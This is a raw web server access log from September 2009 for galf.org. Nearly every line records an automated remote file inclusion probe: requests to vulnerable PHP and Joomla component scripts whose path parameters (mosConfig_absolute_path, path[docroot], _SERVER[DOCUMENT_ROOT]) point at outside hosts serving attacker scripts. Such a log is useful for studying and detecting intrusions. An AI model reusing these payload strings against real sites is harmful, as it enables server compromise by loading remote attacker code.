61.135.134.78 - - [28/Sep/2009:00:06:29 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:06:29 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [28/Sep/2009:00:06:33 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:06:33 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:06:33 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:06:33 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:06:34 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:06:34 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.93.130.37 - - [28/Sep/2009:00:06:36 -0700] "GET /logs/access_090309.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://unixstats.org/tools/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.58 - - [28/Sep/2009:00:08:19 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.58 - - [28/Sep/2009:00:08:19 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.58 - - [28/Sep/2009:00:08:19 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
210.198.6.113 - - [28/Sep/2009:00:09:08 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.198.6.113 - - [28/Sep/2009:00:09:08 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.198.6.113 - - [28/Sep/2009:00:09:08 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [28/Sep/2009:00:09:24 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:09:57 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:09:57 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:09:57 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [28/Sep/2009:00:10:10 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:00:10:10 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:12:52 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.30.194.163 - - [28/Sep/2009:00:12:57 -0700] "GET /logs/access_090608.log/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [28/Sep/2009:00:12:57 -0700] "GET /logs/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [28/Sep/2009:00:12:57 -0700] "GET /db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:13:16 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:13:16 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:13:16 -0700] "GET /newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:13:40 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:13:40 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:13:47 -0700] "GET /logs/access.log%20%20//newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.7 - - [28/Sep/2009:00:13:47 -0700] "GET /newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.7 - - [28/Sep/2009:00:13:47 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [28/Sep/2009:00:13:54 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:00:13:54 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [28/Sep/2009:00:13:58 -0700] "GET /logs/access_090615.log/db.php?commonpath=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:00:14:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:00:14:04 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:16:49 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:16:49 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:16:49 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:17:40 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:17:40 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:17:40 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [28/Sep/2009:00:17:53 -0700] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://seman.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [28/Sep/2009:00:17:53 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://seman.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [28/Sep/2009:00:17:53 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://seman.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [28/Sep/2009:00:17:53 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://seman.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [28/Sep/2009:00:17:53 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://seman.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.248 - - [28/Sep/2009:00:17:53 -0700] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://seman.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:00:18:02 -0700] "GET /newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:00:18:19 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:00:18:33 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:00:18:33 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:00:18:52 -0700] "GET /newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.202.2.64 - - [28/Sep/2009:00:18:52 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.202.2.64 - - [28/Sep/2009:00:18:53 -0700] "GET /logs/access.log%20%20//newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.134.195.174 - - [28/Sep/2009:00:19:10 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:19:10 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:19:11 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:20:11 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:20:14 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:20:17 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:20:17 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
121.134.195.174 - - [28/Sep/2009:00:20:17 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:22:30 -0700] "GET /logs/access.log%20%20//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:22:30 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:22:30 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.142.142 - - [28/Sep/2009:00:22:57 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rucoc.com/pepek.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
125.251.142.142 - - [28/Sep/2009:00:22:57 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rucoc.com/pepek.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:09 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:09 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:09 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:23:10 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:23:10 -0700] "GET /newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:23:10 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:23:11 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:23:11 -0700] "GET /newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:23:11 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:37 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:37 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:37 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:23:39 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:23:39 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:23:40 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:23:57 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:23:57 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:23:57 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:57 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:57 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:23:57 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:24:03 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [28/Sep/2009:00:24:03 -0700] "GET /logs/access.log%20%20//newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [28/Sep/2009:00:24:03 -0700] "GET /newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [28/Sep/2009:00:24:17 -0700] "GET /newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [28/Sep/2009:00:24:17 -0700] "GET /logs/access.log%20%20//newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [28/Sep/2009:00:24:17 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:17 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:17 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:17 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.93.130.37 - - [28/Sep/2009:00:24:21 -0700] "GET /logs/access_090629.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://unixstats.org/tools/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:25 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:26 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:26 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:34 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:34 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:34 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:40 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:40 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:24:40 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.93.130.37 - - [28/Sep/2009:00:24:52 -0700] "GET /logs/access_090309.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://unixstats.org/tools/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:00:25:03 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sports.wisegiga.net/bbs/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:26:04 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:26:04 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:26:04 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:26:13 -0700] "GET /logs/access_090309.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.142.142 - - [28/Sep/2009:00:26:36 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rucoc.com/pepek.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
125.251.142.142 - - [28/Sep/2009:00:26:36 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rucoc.com/pepek.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
125.251.142.142 - - [28/Sep/2009:00:26:36 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rucoc.com/pepek.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:26:39 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
